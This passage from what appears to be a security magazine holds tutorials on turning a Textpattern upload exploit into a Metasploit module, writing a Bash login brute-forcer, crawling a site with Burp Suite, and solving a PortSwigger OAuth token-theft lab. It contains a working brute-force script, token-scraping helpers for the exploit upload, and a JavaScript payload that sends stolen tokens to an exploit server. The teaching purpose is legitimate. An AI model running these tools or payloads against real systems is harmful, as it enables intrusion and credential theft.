done via the Metasploit internal send_request_cgi() function.

Input parameters from the options are stored in the datastore hash. One difference to note here is that, in contrast to the Python requests library's session object, send_request_cgi() keeps no context between calls. So any cookies you obtain from one request (the response object's get_cookies helper returns them) have to be saved separately and manually resent with the next request. send_request_cgi() RubyDoc

The second part of the Python exploit seems to be an upload of a blog post with a long lorem ipsum filler text followed by
the php shell.


The post request seems to contain many options necessary for the request, including our obtained _txp_token.

Here it is helpful to see what the Python generated HTTP POST request looks like exactly. A command line tool named
“proxychains” with the use of Burp Suite helped me here. The config file for proxychains is under
/etc/proxychains.conf. Add the Burp Suite HTTP proxy as the standard configuration:

Now run the exploit with proxychains:

Now we have a request to test our ruby module against:


Let us run our existing module with just the check and see what it does in Burp Suite. Running msfconsole non-interactively is key here; we use a bash script, a resource script, and proxychains:

Now just running ./run.sh handles everything for us. We see our modules correctly authenticate:
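The run.sh from the article is not reproduced on the page, so here is an added, self-written equivalent (not the author's script): it writes a Metasploit resource script that performs the same "use", "set RHOSTS/LHOST ..." and "check"/"exploit" steps typed by hand in the exploitation example above, then runs msfconsole on it, optionally wrapped in proxychains so Burp sees every request. The module name and option values in the usage line are assumptions; any module and options can be passed in.

```bash
#!/usr/bin/env bash
# Added example, not the article's run.sh: build a Metasploit resource script for
# one module and run msfconsole with it non-interactively, optionally through
# proxychains so Burp sees every request. Module and option values are passed in;
# the ones in the usage line below are assumptions.

# write_rc <outfile> <module> <check|exploit> [KEY=value ...]
# Produces the same commands you would type by hand: use, set ..., check/exploit.
write_rc() {
  local out=$1 module=$2 action=$3 final kv
  shift 3
  case "$action" in
    check)   final="check" ;;
    exploit) final="exploit -j -z" ;;   # run as a background job, do not auto-interact
    *) echo "write_rc: action must be check or exploit, got '$action'" >&2; return 1 ;;
  esac
  {
    echo "use $module"
    for kv in "$@"; do
      echo "set ${kv%%=*} ${kv#*=}"    # KEY=value -> set KEY value
    done
    echo "$final"
    echo "exit -y"                      # quit without the "sessions are open" prompt
  } > "$out"
}

# run_msf <rcfile> [proxy]: -q suppresses the banner, -r executes the resource file.
# With "proxy", proxychains wraps msfconsole so its TCP traffic goes through the
# proxy configured in /etc/proxychains.conf (e.g. Burp on 127.0.0.1:8080).
run_msf() {
  if [ "${2:-}" = proxy ]; then
    proxychains -q msfconsole -q -r "$1"
  else
    msfconsole -q -r "$1"
  fi
}

# Usage (assumed values): ./run.sh exploit/unix/webapp/example_webapp check RHOSTS=10.0.0.5 RPORT=80
# Set PROXY=proxy in the environment to route msfconsole through proxychains.
if [ $# -ge 2 ]; then
  rc=$(mktemp) || exit 1
  module=$1; action=$2; shift 2
  write_rc "$rc" "$module" "$action" "$@" || exit 1
  run_msf "$rc" "${PROXY:-}"
fi
```

Keeping the "check" and "exploit" runs as two separate resource scripts means the check can be replayed through Burp as often as needed without a payload ever being sent, and the generated file doubles as a record of exactly which options were used.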


Two things are left to be translated to the Ruby Metasploit Module:

1. Grab the _txp_token from the logged in admin backend page

2. Post the payload

The txp_token can be grepped via a RegEx and substring methods to get the token itself:

The rest is part of the example web app exploit with minor tweaks, like sending the cookies we grabbed earlier and adding
all the HTTP POST parameters.
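The two pieces of state the module carries by hand, the cookies from the login response and the _txp_token scraped from the backend page, are easy to get wrong, so here is an added example (not the article's Ruby module) that isolates both steps as shell functions over raw curl output and can be tested on constructed responses. The JSON and hidden-input layouts of the token, the Textpattern login field names and the backend URL are assumptions, not copied from Textpattern.

```bash
#!/usr/bin/env bash
# Added example, not the article's module: the two bits of state the Ruby module
# has to carry by hand because send_request_cgi() has no cookie jar. Written as
# shell functions over raw curl output so they can be tested on constructed
# samples. Token layouts, field names and URLs below are assumptions.

# cookie_header "<raw response incl. headers>": collect every Set-Cookie name=value
# (attributes such as Path/HttpOnly dropped) into one value for a Cookie: header.
cookie_header() {
  printf '%s\n' "$1" | tr -d '\r' \
    | sed -n 's/^[Ss]et-[Cc]ookie: *\([^;]*\).*/\1/p' \
    | paste -sd ';' - | sed 's/;/; /g'
}

# txp_token "<html>": print the _txp_token value found either in a JSON blob
# ("_txp_token":"...") or in a hidden <input name="_txp_token" value="...">.
# Returns 1 and prints nothing when the page carries no token (e.g. login failed).
txp_token() {
  local html=$1 tok
  tok=$(printf '%s\n' "$html" \
        | grep -o '"_txp_token" *: *"[0-9a-fA-F]*"' | head -n 1 \
        | sed 's/.*"\([0-9a-fA-F]*\)"$/\1/')
  if [ -z "$tok" ]; then
    tok=$(printf '%s\n' "$html" \
          | grep -o 'name="_txp_token"[^>]*value="[0-9a-fA-F]*"' | head -n 1 \
          | sed 's/.*value="\([0-9a-fA-F]*\)"$/\1/')
  fi
  [ -n "$tok" ] && printf '%s\n' "$tok"
}

# Putting it together against a live target (assumed URL and field names; not run
# here): the login response is captured with headers (-D -) so its cookies can be
# replayed, then the backend page yields the token the upload POST must carry.
textpattern_state() {
  local base=$1 user=$2 pass=$3 login cookies backend
  login=$(curl -s -D - -o /dev/null "$base/textpattern/index.php" \
            --data-urlencode "p_userid=$user" --data-urlencode "p_password=$pass")
  cookies=$(cookie_header "$login")
  backend=$(curl -s -H "Cookie: $cookies" "$base/textpattern/index.php?event=article")
  printf 'COOKIE=%s\nTOKEN=%s\n' "$cookies" "$(txp_token "$backend")"
}
```

The same two regular expressions carry over directly into the Ruby module; the point of the shell version is that a wrong cookie name or a changed token layout is caught on captured responses before the module is run against the target.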

And that’s it. Metasploit automatically generates a payload according to the ARCH type we set in the initialization method.
It’s accessible via payload.encoded. It also automatically starts a listener that responds to said payload type.

The only thing left to do is run the exploit and test whether we get a Meterpreter shell.

Our module is in the Metasploit modules folder, but msfconsole must reload the module tree ("reload_all") before it is recognized correctly:


Next, we fill the parameters of the exploit accordingly and add the missing values.

Now we just run the exploit…

Wonderful, we got our meterpreter reverse shell as planned and can go further to exploit the system.


Summary

So, the key steps of creating a Metasploit module are:

1. Find or write an exploit that works in a language you understand.

2. Search an existing module that works similarly to your new one.

3. Copy the .rb file to the correct place.

4. Change the fields in the initialize() method.

5. Use the resources listed under "Create your own Metasploit modules" and other online sources like Stack Overflow to translate the exploit logic to Ruby and the Metasploit ecosystem.

CONCLUSION:

Now you should have a small overview of the advantages and the automation methods of Metasploit. As you can probably
guess, this is only a small part, because the complete topic of Metasploit can fill whole books.

I hope I was able to inspire you on this exciting topic and wish you a lot of fun trying it out yourself!

How about the legal use of Metasploit in a real scenario within a virtual company network? You can find the link and a
coupon code in the author's section.

References:

1. https://www.exploit-db.com/exploits/48943

2. https://www.exploit-db.com/exploits/49620

3. https://www.rubydoc.info/github/rapid7/metasploit-framework/index

4. https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458

BUILD YOUR OWN BRUTE FORCE TOOL
DANIEL GARCÍA BAAMEIRO

Daniel García Baameiro is passionate about hacking. A computer engineer from the Complutense University, he holds a master's degree in cybersecurity from the Carlos III University and is certified by the OSCP. During his professional career, he has dedicated himself exclusively to the offensive side.

Currently, he teaches the subject "Offensive Security" at the International Graduate School and works on the Red Team of the company ISDEFE.

If you liked the article, don't hesitate to give him feedback! He will appreciate it very much: daniel@garciabaameiro.com

His website is the following: http://garciabaameiro.com


DEDICATION

I would like to dedicate this article to Pablo, my ex-boss and my friend. For those good times, for those laughs, and for the
epic jobs we've done, those CTF afternoons are still pending!

INTRODUCTION

When performing a web audit, one of the first challenges you will face is access through a login portal. These portals have been implemented to protect the private part of a website from the public part. Usually, it is in the private area where sensitive private information, or even an administrator's own functionalities that allow the management and editing of the website, can be found.

In order to try to gain access to the private part of a website, brute force attacks tend to be used. These attacks are carried
out by using a dictionary of possible usernames and passwords of a website. If valid credentials are found, access has been
gained.

This article aims to help users understand how web portals work so that they can then create their own tool in the
programming language they feel most comfortable with.

BASIC KNOWLEDGE

Before we get down to the practical part of this article, it is important for the reader to be aware of certain definitions.

HTTP protocol

The HTTP protocol is a hypertext transfer protocol through which information can be transmitted. This protocol is mainly used for web browsing on the internet. When a user accesses a website such as "https://garciabaameiro.com", several HTTP requests are generated, requesting content from the web server, which issues an HTTP response with the requested information.

HTTP Methods

These requests can be differentiated through the following HTTP methods:

GET: this method requests a resource from a web server. By default, the web queries of a user browsing the internet are sent via this method; any parameters travel in the URL itself.

POST: this method is used to send information to a web server. It is mainly used when you do not want the data exchanged via parameters to be sent in the URL address itself, for example with login forms.

PUT: this method uploads a resource to the given URL on the web server, creating or replacing it.

DELETE: this method deletes a resource from a web server.

HEAD: performs the same task as the GET method, but the server returns only the response headers, not the body. That is to say, this method is used when you only want to obtain the status code (or headers) of a web page without retrieving its content.

The OPTIONS method asks the server which methods it accepts for a resource. It is important to note that there are more methods apart from those explained above, such as the TRACE method.

GET method

As explained in the previous section, the GET method requests a resource from a web server. When parameters need to be sent, they are written in the URL itself, after a "?". As an example, the following GET request line is presented without HTTP headers:

GET /index.php?param1=data&param2=data HTTP/1.1

POST method

The POST method, like the GET method, can also carry information to a web server. Unlike the GET method, the parameters are not written in the URL itself, but are transmitted in the body of the request, which is separated from the headers by an empty line.

As an example, the following POST request is presented without HTTP headers (in practice at least Host, Content-Type and Content-Length are sent):

POST /index.php HTTP/1.1

param1=data&param2=data

HTTP headers

HTTP headers provide further information to an HTTP request. It is necessary to make use of some of these headers for the correct exchange of information between a client and a server. The following are some of the most important HTTP headers, including those that must be taken into account when you want to make use of a brute-force script:

User-Agent: this header contains information about the browser, operating system, versions, etc., of the user making a request.

Host: this header carries the domain name or IP address (and port) of the web server the request is meant for; it is mandatory in HTTP/1.1.

Referer: this header (misspelled that way in the standard itself) indicates the address from which a user comes.

Cookie: this header sends back the cookies the server set in earlier responses via Set-Cookie, which is how a session survives between requests.

Authorization: this header hosts the authorization/authentication credentials, e.g. for HTTP Basic authentication.

Content-Type: for a POST, this header tells the server how the body is encoded; a browser form is sent as application/x-www-form-urlencoded.

PLATFORM

This article is intended to be a practical article to guide the reader in developing their own brute force tool. In order to do
so, it is necessary for the reader to create their own test scenario.

This scenario will consist of a simple login portal written in PHP running on a server such as Apache or Nginx. To create it, the user must install a server such as Apache together with PHP (on Debian-based systems the php package pulls in the Apache module) using the following commands:

sudo apt install apache2 php

sudo systemctl start apache2

After that, you only have to copy the code shown in the following section into an "index.php" file and place it in the following path:

/var/www/html/index.php

The display of this file once a web server is up is shown below:


PHP file

The first interface consists of a file named "index.php". This file hosts the form on which a brute-force attack is to be
performed. This form issues a POST request that sends the data to the file itself. If the data is correct,

the user will be able to access. Otherwise, an error message is displayed.

<?php
// Top of the file: when both fields arrive and both match, redirect and stop.
// Both values are upper-cased first, so the check is case-insensitive.
if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = strtoupper($_POST['username']);
    $password = strtoupper($_POST['password']);
    if ($username == "HAKIN9" && $password == "HAKIN9") {
        header("Location: https://youtu.be/LlhKZaQk860");
        exit();
    }
}
?>
<html class="" lang="en-US">
<head>
    <link rel="shortcut icon" href="https://hakin9.org/wp-content/uploads/2015/03/favicon.ico">
    <link rel="icon" type="image/png" href="https://hakin9.org/wp-content/uploads/2015/03/favicon.ico">
    <title>Hakin9 - Brute Force Training</title>
    <link rel="stylesheet" href="https://hakin9.org/wp-content/cache/min/1/743154e87f3df0533705fc7abc44d9b4.css" media="all" data-minify="1">
</head>
<body class="home-page bp-legacy home page-template page-template-notitle page-template-notitle-php page page-id-1427 theme-wplms woocommerce-js wc-shortcodes-font-awesome-enabled d5 g2 c6 minimal logged-out elementor-default elementor-kit-164858">
<header>
    <div class="pop_login" id="vibe_bp_login" style="display: block; top: -100px;">
        <div class="popup_overlay"></div>
        <div class="popup_login">
            <form name="login-form" id="vbp-login-form" action="./index.php" method="post" class="standard-form">
                <div class="inside_login_form">
                    <div class="inside">
<?php
// Second block, inside the form: echo the submitted values (unescaped, which is
// acceptable in this lab but is reflected XSS anywhere else) and print the error
// message the brute-force script will key on. A correct username with a wrong
// password produces a different message than an unknown username, which is
// exactly what makes user enumeration possible.
if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = strtoupper($_POST['username']);
    $password = strtoupper($_POST['password']);
    echo '<span>'.$username.' '.$password.'</span>';
    if ($username == "HAKIN9" && $password != "HAKIN9") {
        echo '<span style="color: red; text-align: center; display: block;">WRONG PASSWORD</span>';
    } else {
        // The original listing is cut off here; this branch is reconstructed from
        // the article's description of the portal (WRONG CREDENTIALS when the
        // username is wrong; a valid pair was already redirected above).
        echo '<span style="color: red; text-align: center; display: block;">WRONG CREDENTIALS</span>';
    }
}
?>
                        <!-- Input markup reconstructed: the field names are fixed by the PHP
                             above and the LOG IN button is the one the article refers to. -->
                        <input type="text" name="username" placeholder="Username">
                        <input type="password" name="password" placeholder="Password">
                        <input type="submit" value="LOG IN">
                    </div>
                </div>
            </form>
        </div>
    </div>
</header>
</body>
</html>

ANALYSING THE LOGIN

In order to build our brute force tool, we must first understand what we are dealing with. The easiest way to do this is to play with the login portal: try different values in its fields and see how it reacts.

In many cases, user enumeration or credential collection starts from the error messages the login portal displays to the user. Therefore, the objective is to catalogue the types of errors the portal produces and exploit them with brute force until valid credentials are obtained.

Analysing the login portal and introducing some test credentials such as the user name "test" and the password "test", it is observed that the following HTTP request is generated:

This request can be consulted through the browser's "Web Developer Tools", which can be opened with the key combination "Ctrl+Shift+I". In Mozilla Firefox, the menu option we are interested in is the Network section. With it open, pressing the "LOG IN" button to send the credentials generates several requests, including the one shown above. Right-clicking the request lets us export it in a reusable format (for example "Copy as cURL").


This returns the following information as a result via the website:


Taking into account this data, where we have identified the error messages, it is time to move on to the creation of our tool. The steps are simple: generate a request to the portal and compare the responses returned.

BRUTE FORCE TOOL

The language chosen for the creation of this tool is the Bash shell. We can use it on any GNU/Linux distribution, or on Windows by installing it (for example, through WSL).

As a first step, we need to make HTTP requests. To do this, we use the curl command, which lets us send requests, choose the HTTP method and add headers and parameters. Looking at the previous section where we exported the request, we can see that it can be exported as a curl command. The export produces something similar to the one shown below:

For our case, we have found that most of the HTTP headers present in the request are not necessary. This is why we have
cleaned up the request, leaving it in the state shown below:


Remembering the section on the analysis of the login portal, we know the following:

• In case of failure in the user and password, a message appears indicating the sentence WRONG CREDENTIALS.

• In case of failure only in the password, a message appears indicating the sentence WRONG PASSWORD.

• In the case of having both parameters right, no message is displayed, since access to the portal has been gained.

Keeping this in mind, we only have to save the response of each request and compare it with the different error messages. To do this, we write the following lines in our script, filtering the response for the word "WRONG" and silencing curl's progress output with the -s option:

It is important to add a dictionary so that we are not limited to a single hard-coded user name and password. To do this, the reader is suggested to create a text file named "dictionary.txt" containing the following lines:


This file will be read line by line where, for each line, a new request will be made. The script would look like this at this
stage:

It only needs to be fixed so that, when the user name is correct, it is reported only once, and when the password is found the loop and the script end. To make it more attractive, we include colours during the execution. And, of course, we can't miss the ASCII art.

The final script, which we will host in a file named "script.sh" and give permissions to run it with the command

chmod +x script.sh, would look like this:


The execution is shown below:


Of course, this can be extrapolated to other languages. The goal is the same, to compare error messages until you find the
one that is different. If the difference is because access to the login portal has been gained, valid credentials have been
obtained.
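As an added example (not the article's own script, which appears only as a screenshot), the following Bash tool implements the steps described above. It assumes that the form posts fields named username and password, as in the PHP listing at the start of the section; that a response contains the string WRONG CREDENTIALS when both values are wrong, WRONG PASSWORD when only the password is wrong, and neither string on success; and that dictionary.txt holds one candidate word per line. The two-phase approach (find the user name first, then its password) is one reading of the behaviour described above, and the login URL used in the usage line is a placeholder.

```bash
#!/usr/bin/env bash
# Added example, not the article's own script. Assumptions: the form posts
# "username" and "password"; a response body contains "WRONG CREDENTIALS"
# when both are wrong, "WRONG PASSWORD" when only the password is wrong, and
# neither string when the login succeeds; dictionary.txt has one word per line.

# Classify a response body by the error message it contains.
# Prints WRONG_CREDENTIALS, WRONG_PASSWORD or SUCCESS.
classify_response() {
    case "$1" in
        *"WRONG CREDENTIALS"*) echo WRONG_CREDENTIALS ;;
        *"WRONG PASSWORD"*)    echo WRONG_PASSWORD ;;
        *)                     echo SUCCESS ;;
    esac
}

# One login attempt. -s silences curl's progress meter so only the body
# is printed; --data-urlencode escapes special characters in the words.
try_login() {
    curl -s --data-urlencode "username=$2" --data-urlencode "password=$3" "$1"
}

green() { printf '\033[32m%s\033[0m\n' "$1"; }
red()   { printf '\033[31m%s\033[0m\n' "$1"; }

# Phase 1: try every word as the user name with a dummy password; the first
# WRONG PASSWORD reply reveals a valid user (reported once).
# Phase 2: keep that user and try every word as the password until the
# portal answers without an error, then stop.
brute_force() {
    url=$1; wordlist=$2; user=""
    while IFS= read -r word || [ -n "$word" ]; do
        [ -z "$word" ] && continue
        case "$(classify_response "$(try_login "$url" "$word" "x")")" in
            WRONG_PASSWORD) user=$word; green "[+] user found: $user"; break ;;
            SUCCESS)        green "[+] valid credentials: $word / x"; return 0 ;;
            *)              red "[-] $word is not a valid user" ;;
        esac
    done < "$wordlist"
    [ -n "$user" ] || { red "[-] no user name found in $wordlist"; return 1; }

    while IFS= read -r word || [ -n "$word" ]; do
        [ -z "$word" ] && continue
        if [ "$(classify_response "$(try_login "$url" "$user" "$word")")" = SUCCESS ]; then
            green "[+] valid credentials: $user / $word"
            return 0
        fi
        red "[-] wrong password for $user: $word"
    done < "$wordlist"
    red "[-] password not in $wordlist"
    return 1
}

# Usage: ./script.sh http://TARGET/login.php [dictionary.txt]
# (login.php is a placeholder for the portal's real login URL.)
if [ $# -ge 1 ]; then
    brute_force "$1" "${2:-dictionary.txt}"
fi
```

The attack only works because the portal leaks which half of the credentials is wrong. A portal that returns one generic message for every failed login leaves nothing to compare, and account lockout or rate limiting on the server side will stop the loop long before a large wordlist is exhausted, so check for both before relying on this approach.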

REFERENCES:

1. Bash Reference Manual: https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.html

2. Bash Introduction for Hackers Part 1: https://hakin9.org/bash-introduction-for-hackers-part-1/

3. Bash Introduction for Hackers part 2: https://hakin9.org/bash-introduction-for-hackers-part-2/

CRAWLING WEBSITES USING BURP SUITE

MAYUKH PAUL
I am a typical college student with a keen interest in the field of cybersecurity and social engineering. The art of psychologically manipulating people into performing actions or divulging confidential information intrigues me. I enjoy trying out new tools and exploiting new vulnerabilities. The more vulnerabilities I exploit, the more my urge to learn increases. I aim to dive more into the field of cybersecurity research and protect company security against cyber threats.

128
Crawling Websites Using Burp Suite

Burp Suite is a platform created by PortSwigger consisting of various security tools used to perform web application penetration testing. These tools work together to cover the whole testing process, from mapping the attack surface to finding and exploiting vulnerabilities.

Some of the security tools in Burp Suite are:

Target: This tool contains detailed information about the target application, such as the site map and the scope of the test.

Proxy: An intercepting web proxy that sits as a man-in-the-middle between the browser and the target web application, letting you view and modify requests and responses in flight.

Intruder: A customizable tool for carrying out automated attacks against web applications.

Repeater: This tool lets you manually modify and reissue individual HTTP requests and analyze the application's responses.

Sequencer: This tool analyzes the randomness of an application's session tokens or other data items that are intended to be unpredictable.

Decoder: This tool transforms data between raw and encoded or hashed forms (URL, HTML, Base64, hex, and hash functions such as MD5 or SHA).

Comparer: This tool performs a visual comparison of two data items.

And many more.

In this article, I am going to use Burp Suite to crawl and audit a website.

1. Click on ‘New scan’ to open up the scan configuration window.

2. In the new scan window, we specify the target website. There are two scan types:

2.1. Crawl

2.2. Crawl and Audit


Here, I will demonstrate a default Crawl and Audit scan; the website I used is ‘http://testphp.vulnweb.com/’, a deliberately vulnerable demonstration site for the Acunetix Web Vulnerability Scanner.

The protocols used by the scan can be customized further: the target can be scanned over both HTTP and HTTPS, or the specific protocols to use can be set manually.

3. The scope of the scan can be further configured. By default, the scanner starts from the URL provided, but here additional URL prefixes that should be included in or excluded from the scan were added.


4. We further configure the scan for crawling and auditing the target. First, under ‘scan configuration’, select ‘new’
to configure the crawling feature.

5. In the crawling scan configuration window, we define the behavior of the scan as preferred.


Let’s look further into the configuration option here:

• Crawl Optimization: Here, we can control the link depth and crawl strategy to one’s preference if one prefers
speed or deep coverage.

• Crawl Limits: Under crawl limits, one can set for how long the crawl should occur or the maximum number of
requests and locations it will crawl.


• Login Functions: If a user registration form is found, the crawler can attempt to self-register a user during the scan. It can also trigger login failures with invalid credentials, in order to observe the behavior that occurs when a login fails.

• Handling Application Errors During Crawl: This feature controls how the scanner handles errors. One can configure the number of consecutive requests that may time out before the task is paused.

• Miscellaneous: This lets one configure the crawl further, such as whether to submit forms, request the robots.txt file, parse API definitions, request site maps, etc.


6. Next, we look further into the ‘auditing’ menu.

7. The below figure summarizes the configuration options in the auditing menu.

8. Let’s look into some of the configuration options:

• Audit Optimization: This feature lets one optimize the auditing behavior according to their requirement. Further
modifications can be made in audit speed, audit accuracy, redirections and automatically maintaining sessions.


• Issues Reported: This feature controls which issues Burp Suite will report. The issues can be selected by scan type or individually.


• Handling Application Errors During Audit: This feature controls how the scanner handles transmission
timeouts and connection failures. The number of failed audit checks, number of failed insertion points, etc., can be
configured further.

• Insertion Point Types: This feature controls the placing of insertion points into HTTP requests during an audit.
Insertion point categories like URL and body parameter value, cookie values, HTTP header, etc., can be configured.

• Modifying Parameter Location: This feature lets the scanner shift parameters to other locations within the
request, at the same time testing them in their actual position.


• Ignored Insertion Points: This feature lets one specify the parameters for which the scanner should skip audit checks.

• JavaScript Analysis: This feature lets the scanner detect DOM-based JavaScript vulnerabilities.

9. Burp also ships with built-in scan configurations that can be combined to create the desired generic scan.


10. Next, the option in the menu is ‘Application Login’. This feature uses the manually entered login credentials to
automatically check if login attempts can succeed when the crawl or audit comes across a login form.


Login credentials can be entered manually, or a login sequence recorded with Burp's browser extension can be used.

11. Last in the configuration menu is ‘Resource Pool’. Resource pools throttle the scan: each pool can be configured with the maximum number of concurrent requests and a delay between requests.


12. Once the desired configuration is made, pressing the ‘OK’ button will initiate the scan.

13. Once the scan is in process, it will start crawling the target and in a while, the estimated time will be calculated
and displayed.

14. Once the crawling is completed, the audit is initiated automatically.

15. Under the Issue activity tab on the right side, all the discovered vulnerabilities of the target are shown. Clicking
on a specifically found vulnerability gives the details about it.


16. Once auditing is completed, further details from the scan can be viewed by clicking the view details tab.

17. On viewing details, we can find further options of the scan results:

Details: A summarized detail of the scan.


Audit items: Details of the performed audit.

Issue Activity: Displays the discovered vulnerabilities, which can be sorted according to priority.


Event log: Displays the occurred events including errors and details about them.

Logger: Detailed information about the performed scan log.


18. To view a detailed report of the scan we go to the ‘target’ tab, right-click on the target, and select Issue ->
Report issues for this host


19. Next, we select the format of the report.

20. The details required to be displayed can be specified.

21. The HTTP requests and responses can also be displayed on the report if required.


22. The issues required to be included in the report can be shortlisted in this menu.

23. Lastly, we provide the details and select the destination for the report to be saved.


24. Once everything is completed the report gets created.

25. The report displays detailed findings of the scan. The below images show some of the intel gathered from the
scan.

SOLVING AN EXPERT LAB FROM WEB SECURITY ACADEMY

MICHAEL SOMMER
Michael Sommer is a security consultant and pentester at Consulectra Unternehmensberatung GmbH in Hamburg. He has been involved in IT security since 2006 and his focus is on web security, application security, cloud security and critical infrastructure security. Michael runs a YouTube channel where all the Web Security Academy labs are solved. Currently, there are more than 300 videos there. Some of them are still without audio commentary, but these will be replaced gradually.

152
Solving An Expert Lab From Web Security Academy

INTRODUCTION

This tutorial is a walkthrough of the lab “Stealing OAuth access tokens via a proxy page” from the Web Security Academy by PortSwigger. The level of this lab is expert, and the reader should have a basic understanding of HTML and JavaScript. It is also recommended to have worked through the topic “OAuth 2.0 authentication vulnerabilities” beforehand. This lab can be solved with the Community Edition of Burp Suite; no Professional version is needed. You should have configured your browser and Burp Suite so that you can intercept the traffic. In the reference section is a link where you can find information about the browser configuration.

SOLVING THE LAB

Preparation

Before you can start solving the lab, you must create an account at the Web Security Academy. After successful creation,
you can access the lab by clicking the button “Access the lab” at the bottom of the lab site.

Figure 1: Access the lab

The blog should look like the following figure. Because the order of the blog posts varies, you may see a different post at the top when you access the lab. At the time of writing, the blog entries were always the same; if you see other entries, this is not a problem, because the source code has not changed.


Figure 2: The First Blog Post

At this point, you should configure your Burp Proxy to intercept the traffic. For that, open the “Proxy” tab and then the
“Intercept” tab, activate the button “Intercept is on”. If you use a plugin like FoxyProxy, enable the configured connection
for your Burp Suite. The next figure shows the Burp Proxy configuration.

Figure 3: Configure Burp Proxy

Identify a useful Vulnerability

At the blog page, click the link “My account” in the upper right. You will be redirected to a login form, where you must put
in the username “wiener” and the password “peter”. You will find these credentials at the lab site.


Figure 5: My Account

After you type in the credentials and click the button “Sign-in”, you are redirected to a website where you must authorize
the application. Here, the only task is to click the “Continue” button. After that, the application has access to your profile
and your mail address. You will be redirected to the start page of the blog.

The next step is to open the HTTP history in Burp Proxy. Click the “Proxy” tab and then the “HTTP history” tab. It should look like the following figure; of course, the host names will differ from yours.

Figure 6: HTTP History

You should study the whole OAuth flow and take a closer look at the GET request to the endpoint
/auth?client_id[..]. Send this request to Burp Repeater. You do this by right clicking in the „Request“ section and
selecting the option „Send to Repeater“. After that, switch to Burp Repeater.

Figure 7: Send The Request To Burp Repeater


In Burp Repeater, you see the GET request in the „Request“ section. This request contains the following OAuth parameters:

• client_id: Unique identifier of the client application.

• redirect_uri: URL to which the user's browser should be redirected.

• response_type: Kind of response the client application is expecting.

• scope: User's data the client application wants to access.

There is another parameter named nonce, and its value must be used in the exploit code. Do not be confused by the nonce parameter: it looks like the state parameter, but the two serve different purposes. Explaining the difference is out of scope for this tutorial; there is a link in the reference section where you can find more information.

Figure 8: GET Request in Burp Repeater

Normally, you should probe every OAuth parameter in the URL. But to save some time, we will concentrate on the redirect_uri parameter. Many OAuth attacks are based on exploiting flaws in the validation of this parameter. Your redirect_uri parameter should look like the following: redirect_uri=https://YOUR-LAB-ID/oauth-callback. If you delete the part oauth-callback from the URL and send the request to the application, you will receive an HTTP/1.1 400 Bad Request. But if you append the sequence /../.. to the original value, you will receive an HTTP/1.1 302 Found. That means the server only checks that redirect_uri starts with the registered value and does not normalise the path first: the redirect_uri parameter is vulnerable to directory traversal. This enables you to redirect access tokens to arbitrary pages on the blog website.


Figure 9: 400 Bad Request

Figure 10: 302 Found


Continue to inspect

Now, audit the other pages on the blog website. Open a post and send a comment to that post. Switch to Burp Proxy and
open the „HTTP history“ tab. Take a look at the GET request to the endpoint /post?postId=<ANY_NUMBER>. In the
„Response“ section within Burp Proxy, scroll down to the comment section. Almost at the end of the HTML code, you will
notice an iframe tag. The comment form is included as an iframe tag.

The iframe tag

An iframe tag embeds another HTML page into the current one and represents a nested browsing context. Each browsing context has its own session history and document. Note that every iframe in a page requires additional memory and other computing resources.

Figure 11: Leave A Comment

Figure 12: Comment Form In Iframe Tag

Take a closer look at the GET request to the endpoint /post/comment/comment-form. In the „Response“ section within the „HTTP history“ tab, you will notice that at the top of the <body> section a <script> tag is included. You see a postMessage() call that sends the window.location.href property to its parent window. The window.location.href property contains the entire URL, including the fragment, which is where the implicit flow (response_type=token) delivers the access token. The second parameter (*) of the postMessage() method allows the message to be posted to any origin.

The postMessage() method

The postMessage() method enables cross-origin communication between Window objects. For example, between a page
and an iframe embedded within it. Normally, scripts on different pages are not allowed to access each other. This access is
prevented by the same origin policy (SOP). The use of postMessage() provides a controlled mechanism to securely
circumvent this restriction. The syntax looks like:

• targetWindow.postMessage(message, targetOrigin, [transfer]);

• targetWindow: A reference to the window that will receive the message.

• message: Data to be sent to the other window.

• targetOrigin: Specifies what the origin of targetWindow must be for the event to be dispatched. You should always provide a specific targetOrigin, not „*“; with „*“ any page that has embedded the sender can read the message.

• [transfer]: It is an optional parameter.

Figure 13: PostMessage Method

prepare the exploit

In the „HTTP history“ tab, right click on the GET request to the endpoint /auth?client_id=[..] and select „Copy
URL“. Open your preferred editor and paste the URL.


Figure 14: Copy URL

Switch to your browser and click the button „Go to exploit server“. At the exploit server, you have three sections, named
File, Head and Body. In the File section, you can specify a file name. Leave this as it is. In the Head section, you can add
additional HTTP headers. This is not necessary in this lab. The last section is the Body section. Here, we must insert our
exploit code.

Figure 15: Sections in Exploit Server


The first part of our exploit code is an iframe that should look like the following.

<iframe src="https://YOUR-LAB-AUTH-SERVER/auth?client_id=YOUR-LAB-CLIENT_ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-1552239120&scope=openid%20profile%20email"></iframe>

You see in the src attribute that we use directory traversal (/../) to change the redirect_uri so that it points to the
comment form. There are some parts in the URL that depend on your lab instance. The following list will show you where
you find this information.

• YOUR-LAB-AUTH-SERVER: The value of the host header in the GET request to the endpoint
/auth?client_id=[..].

• YOUR-LAB-ID: That is the address of your lab instance. Switch to your browser and click the “Home” link in the
upper right, then copy the address from the address bar.

• YOUR-LAB-CLIENT_ID: The client_id is in the same GET request where you find the
YOUR-LAB-AUTH-SERVER value.

The second part of our exploit code is a script tag with some JavaScript in it. The next few lines will explain the JavaScript
in more detail.

<script>
window.addEventListener('message', function(e) {
    fetch("/" + encodeURIComponent(e.data.data))
}, false)
</script>

The addEventListener() method

The EventTarget method addEventListener() sets up a function that will be called whenever the specified event is delivered to the target. The first parameter is a string representing the event type, in this case ‘message’. The second parameter is the listener; this must be an object implementing the EventListener interface, or a JavaScript function. In this case, it is a function that uses fetch() to request a path built from the URL-encoded event data, so that the data ends up in the exploit server's access log. The third parameter is optional.

The fetch method

The fetch() method belongs to the Fetch API and provides an easy, logical way to fetch resources asynchronously across
the network.


This JavaScript reveals the web message in the exploit server's access log. Your Body section should similarly look like the
following figure. Please keep in mind that the URLs may look different in your lab.

Figure 16: Finished Exploit

solve the lab

We must check that the exploit is working, store it and then click the button “View exploit” under the Body section. An
iframe should appear in which the comment form is displayed.

Figure 17: The Comment Form in Iframe

Click the back button in your browser and if you are back at the exploit server, click the button “Access log” under the Body
section. The server log will open, and you see some GET and POST requests. Look for a GET request in which you find the
full URL of the comment form. In this request, you also see an access token.

Figure 18: Access Log

